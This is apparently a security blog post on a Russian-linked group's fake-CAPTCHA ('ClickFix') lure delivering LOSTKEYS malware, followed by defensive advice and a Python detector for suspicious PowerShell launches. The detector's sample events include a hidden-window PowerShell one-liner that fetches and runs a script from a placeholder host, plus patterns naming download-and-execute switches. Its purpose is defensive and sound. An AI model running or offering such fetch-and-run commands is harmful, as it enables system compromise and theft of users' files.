Beware the Fake CAPTCHA: Russian Hackers Are Using It to Steal Your Data


On the front lines of the ever-evolving cyber threat landscape, Russian-linked hacking group COLDRIVER, also known as Star Blizzard, Callisto, and UNC4057, has introduced a new malware strain dubbed LOSTKEYS. This espionage-focused malware is deployed using a clever social engineering technique called ClickFix – a fake CAPTCHA prompt that tricks users into executing malicious commands on their own systems.

The Rise of ClickFix: How Hackers Bypass Human Caution

ClickFix is a social engineering trick designed to look like a harmless CAPTCHA check. When victims land on a decoy website, they are asked to complete a CAPTCHA verification. However, this is no ordinary security check. Instead of a typical verification, users are instructed to open the Windows Run dialog and paste a PowerShell command that the page has already placed on their clipboard. This simple action initiates a multi-stage infection process that delivers the LOSTKEYS malware onto the victim’s device.

What makes this particularly dangerous is that the fake CAPTCHA prompt exploits the victim’s habit of treating CAPTCHA checks as a harmless, routine step. Because the user runs the command themselves, the technique slips past defenses built to stop attacker-delivered files, relying on human error rather than a software flaw to gain access to sensitive systems.

This fake CAPTCHA prompt has been spotted targeting high-profile officials. Google’s Threat Intelligence Group (GTIG) reported that COLDRIVER uses this technique to infiltrate systems of NATO officials, Western diplomats, and non-governmental organizations (NGOs). In some cases, individuals connected to Ukraine have also been targeted, reflecting COLDRIVER’s alignment with Russia’s strategic intelligence objectives.

Who Is Being Targeted?


According to GTIG, the primary targets of LOSTKEYS are advisors to Western governments and militaries, journalists, think tanks, NGOs, and individuals connected to Ukraine. The attacks were observed in January, March, and April of 2025, marking an aggressive expansion of COLDRIVER’s espionage efforts.

The targeting of individuals connected to Ukraine underscores Russia’s strategic goals, which include intelligence gathering on political and military strategies. Western diplomats and government advisors are particularly attractive targets due to their access to confidential discussions and planning documents. This highlights a broader trend of state-sponsored cyber espionage being used as a tool for political leverage.

Moreover, COLDRIVER’s selective targeting has made these attack campaigns highly effective. By focusing on systems that store critical geopolitical information, the malware’s payload can yield maximum value for Russia’s intelligence services. The targeting of journalists, think tanks, and NGO personnel also suggests that the group seeks to control narratives and gather sensitive reports related to international relations and security.

How ClickFix Works to Deploy LOSTKEYS

The ClickFix technique is a sophisticated form of social engineering designed to trick users into executing malicious code on their own devices without realizing it. Here’s how it works:

Decoy Website Setup: Hackers set up a fake website that looks legitimate. When visitors land on this site, they are greeted with a CAPTCHA verification prompt, similar to those used by many websites. However, this CAPTCHA is a trap, designed to deceive the victim into executing the next steps.

The Fake CAPTCHA Trick: Instead of performing a real CAPTCHA check, the page instructs the user to open the Windows Run dialog (Win + R) and paste a command that has been copied to their clipboard. The prompt may seem official, and the instructions appear harmless. The simplicity of the task makes it more likely that the user will comply without suspecting anything malicious.

PowerShell Command Execution: Once the user pastes and executes the copied PowerShell command, it connects to a remote server controlled by the hackers. This server then pushes the next stage of the malware to the victim’s device. Because PowerShell is a trusted, built-in Windows tool and the command is launched by the user rather than by a malicious attachment, the activity blends in with legitimate use and can run complex payloads without tripping defenses that focus on attacker-delivered executables.

Multi-Stage Infection Process: The PowerShell command initiates a multi-stage infection process that delivers the LOSTKEYS malware to the victim’s system. This malware is specifically designed to look for and target sensitive files. It scans for specific types of documents, such as .docx, .pdf, .xlsx, and .eml, which could contain confidential information, such as government reports, emails, and personal communications.

Data Exfiltration: Once the malware finds valuable files, it exfiltrates them to COLDRIVER’s remote servers for further analysis and exploitation. The process is designed to be covert, evading detection by traditional antivirus or intrusion detection systems. By the time victims realize their systems have been compromised, the data may already have been stolen and exploited.

Why This Is Dangerous

The reason ClickFix is so effective lies in its simplicity and the vulnerability it exploits: human error. CAPTCHA checks are commonplace, and most users don’t think twice before completing them. By presenting the task of copying and pasting a command as a simple step, hackers easily exploit this trust.

Additionally, the LOSTKEYS malware itself is highly effective in carrying out its espionage goals. The malware can operate quietly in the background, stealing valuable data without leaving a noticeable trace. This stealthiness makes detection difficult for the victim until it’s too late, and by then, sensitive data could already be in the hands of the attackers.

The rising sophistication of such social engineering tactics underlines the growing threat of cyber espionage. The ClickFix trick takes advantage of the user’s willingness to trust what appears to be a simple, benign task, making it particularly dangerous.

Preventive Measures and Solutions to Protect Against the LOSTKEYS Malware Attack

While the attack method is sophisticated, there are steps that individuals and organizations can take to minimize the risk of falling victim to it.

User Education and Awareness: Regularly train users to be cautious about unsolicited requests to execute commands or enter sensitive information. Encourage them to verify any unusual request before taking action.

Enable Multi-Factor Authentication (MFA): MFA adds an additional layer of protection to sensitive accounts, making it harder for hackers to gain unauthorized access.

PowerShell Restrictions: Restrict or disable PowerShell scripting on systems where it’s not required. This can significantly limit the attacker’s ability to execute malicious code via PowerShell.

Real-Time Monitoring and Threat Detection: Implement advanced threat detection systems that can detect unusual activities, such as unauthorized script execution or data exfiltration attempts.

Web Filtering: Use web filtering tools to block known malicious websites and prevent users from visiting sites that could host the fake CAPTCHA prompts.
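The following Python script is an added example, not code from the article, Hoplon InfoSec, or GTIG. It shows the detection logic the monitoring recommendation above calls for, applied to the ClickFix execution chain described earlier: PowerShell launched interactively by the user (its parent process is the desktop shell, explorer.exe, which is what a Win+R launch produces) with fetch-and-run switches on its command line. The event records, field names, indicator weights and alert threshold are all constructed for this example; the domain in the sample command is a reserved placeholder.

```python
"""Flag ClickFix-style PowerShell launches in process-creation telemetry.

Added example (not the article's or GTIG's code). Field names loosely follow
Sysmon Event ID 1 / Windows Security 4688; all sample events are constructed.
"""
import re
from dataclasses import dataclass, field


@dataclass
class ProcessEvent:
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str   # command line as recorded by the sensor
    user: str           # account the process runs as


@dataclass
class Finding:
    event: ProcessEvent
    score: int
    reasons: list = field(default_factory=list)


# Command-line traits of a "fetch a payload and run it" one-liner.
# (name, pattern, weight): the weights and the threshold are this example's own choice.
INDICATORS = [
    ("remote fetch", re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod"
        r"|\birm\b|net\.webclient|start-bitstransfer", re.I), 3),
    ("url in command", re.compile(r"https?://", re.I), 1),
    ("dynamic execution", re.compile(r"invoke-expression|\biex\b", re.I), 3),
    ("encoded command", re.compile(
        r"-e(?:nc|ncoded|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("execution policy bypass", re.compile(
        r"(?:-ep|-ex|-exec|-executionpolicy)\s+bypass", re.I), 2),
    ("profile suppressed", re.compile(r"-nop\b|-noprofile", re.I), 1),
]
POWERSHELL = ("powershell.exe", "pwsh.exe")
THRESHOLD = 6


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event: ProcessEvent):
    """Return a Finding when the event looks like a ClickFix launch, else None."""
    if basename(event.image) not in POWERSHELL:
        return None
    score, reasons = 0, []
    # A PowerShell process parented by the desktop shell was started by the
    # user (Start menu, Win+R Run dialog, shortcut). Benign on its own, which is
    # why it only contributes to the score; combined with fetch-and-run switches
    # it is the shape of the ClickFix chain.
    if basename(event.parent_image) == "explorer.exe":
        score += 3
        reasons.append("launched from explorer.exe (interactive user launch)")
    for name, pattern, weight in INDICATORS:
        if pattern.search(event.command_line):
            score += weight
            reasons.append(name)
    return Finding(event, score, reasons) if score >= THRESHOLD else None


def scan(events):
    """Findings for every event that crosses the threshold, in input order."""
    return [f for f in map(analyze, events) if f is not None]


# Constructed sample telemetry: two benign launches, one scheduled task,
# one plain-text and one encoded ClickFix-style launch.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
SAMPLE_EVENTS = [
    ProcessEvent(PS, EXPLORER, f'"{PS}"', "CORP\\admin1"),
    ProcessEvent(PS, EXPLORER,
                 "powershell -w hidden -ep bypass -nop -c \"iex (iwr "
                 "'https://captcha-check.example/verify.txt' -UseBasicParsing)\"",
                 "CORP\\jdoe"),
    ProcessEvent(PS, r"C:\Windows\System32\svchost.exe",
                 r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1",
                 "NT AUTHORITY\\SYSTEM"),
    ProcessEvent(PS, EXPLORER,
                 "powershell.exe -nop -w hidden -enc "
                 "QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQA=",
                 "CORP\\asmith"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", EXPLORER, "cmd.exe /k", "CORP\\jdoe"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[score {finding.score}] {finding.event.user}: "
              f"{', '.join(finding.reasons)}")
```

In a real deployment the three fields map to Sysmon Event ID 1 (Image, ParentImage, CommandLine) or to Security event 4688, which only carries the command line when "Include command line in process creation events" is enabled. The scheduled-task record shows why a plain "-ExecutionPolicy Bypass" match is not enough on its own, and the encoded record shows that the check still fires when the payload text is hidden; PowerShell Script Block Logging (Event ID 4104) records the decoded content of such commands and complements this process-creation check.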

Conclusion

COLDRIVER’s use of the ClickFix trick in deploying the LOSTKEYS malware marks a new chapter in cyber espionage. By using a fake CAPTCHA prompt, the group can trick users into executing malicious code that allows them to steal sensitive data. This multi-stage infection process highlights the increasing sophistication of cyberattacks aimed at high-profile individuals and organizations with access to valuable geopolitical intelligence.

As cyber threats evolve, it’s crucial for both individuals and organizations to prioritize cybersecurity awareness and defense systems. Proactive measures like user education, MFA, and real-time threat detection can help mitigate the risks of falling victim to these types of attacks. The growing reliance on digital platforms makes it more important than ever to be vigilant and prepared.

Did you find this article helpful? Follow us on Twitter (@hoploninfosec) and LinkedIn (Hoplon InfoSec) for more Cyber Security news and updates. Stay connected on Facebook and Instagram as well. At Hoplon Infosec, we’re committed to securing your digital world.

Learn More: Fake CAPTCHAs are being used to spread malware

Hoplon Infosec